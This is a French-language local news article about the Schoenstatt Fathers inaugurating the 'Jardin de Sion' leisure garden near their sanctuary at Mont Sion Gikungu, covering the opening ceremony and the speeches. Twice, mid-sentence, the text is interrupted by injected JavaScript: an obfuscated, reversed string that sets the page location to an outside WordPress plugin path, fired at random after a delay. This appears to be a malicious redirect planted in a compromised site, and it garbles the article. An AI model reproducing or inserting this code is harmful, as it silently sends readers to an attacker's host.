La communauté des Pères de Schoenstatt de Mont Sion Gikungu a solennellement inauguré un lieu de repos, de divertissement et de fêtes pour la population des environs du Sanctuaire. C’est un beau jardin situé à une centaine de mètres vers le nord du Sanctuaire. D’aucuns se sont très bien attendus à une école qui serait bâtie en cet endroit comme il est placé au milieu des maisons d’habitations, et nous ne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doutons pas qu’il y ait des enfants en âge de scolarité un peu partout. Selon les informations recueillies sur place, les services de l’urbanisme auraient refusé la demande d’y implanter une école parce que les dimensions exigées n’étaient pas suffisantes. Ce jardin toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont nous vous parlons présente un certain nombre d’avantages pour toutes personnes qui le visite pour étancher sa soif, qui y amène des enfants pour jouer ou encore pour des personnes qui y prépareront des fêtes. Il est suffisamment vaste d’environ quarante ares et sans beaucoup de constructions encombrantes, il comprend un endroit prévu spécifiquement pour les jeux des enfants, deux endroits différents pour les comptoirs permettant un service rapide et de qualité. Nous ne pouvons pas ne pas mentionner le parking interne qui semble suffisant pour plusieurs voitures des visiteurs. Le jardin qui accueillera des clients visiteurs est en gazon bien entretenu, ce qui offre aux visiteurs un libre choix de place ou s’asseoir. Le système d’éclairage en cet endroit y est minutieusement installé et il n’y a pas lieu de s’inquiéter à ce point. Enfin, comme l’endroit est clôturé, le contrôle des entrées, des sorties et même de la circulation interne des personnes est bien assuré.  

Les cérémonies d’ouverture du lieu ont débuté à 15h30 minutes par une prière dirigée par le Père Alain AMANI en place et lieu du Père Supérieur de la Communauté qui est dignement empêché par d’autres fonctions. Il y avait, aux côtés du Père AMANI, les Pères Floribert KANEZA, Marcien NDAYIZEYE et Japhet SIMBIZI. Les Pères Christian MURHABALE et Léonce NTAKIRUTIMANA se sont joints aux autres un peu plus tard, après la messe de 16h. Dans son discours d’ouverture solennelle du Jardin de Sion et d’accueil des invités, le Père a souhaité la bienvenue à tout un chacun en cet endroit prévu pour étancher la soif, se divertir et passer de bons moments de fêtes familiales ou autres. Il a ensuite souhaité que tous ceux qui y étaient feront une bonne publicité de l’endroit afin qu’il ait plus de visiteurs.  

Monsieur Yves BIGIRINDAVYI qui a représenté les invités a remercié les Pères de Schoenstatt pour leur bonne initiative de création du Jardin de Sion. Il aurait souhaité y voir une école pour les enfants à tous les niveaux ou un centre de santé, mais il a tout de même reconnu que ce ne sont pas tous les souhaits des uns et des autres qui trouvent satisfaction. La fin des cérémonies a eu lieu vers dix-huit heures et demie dans une ambiance festive.

NYANDWI M.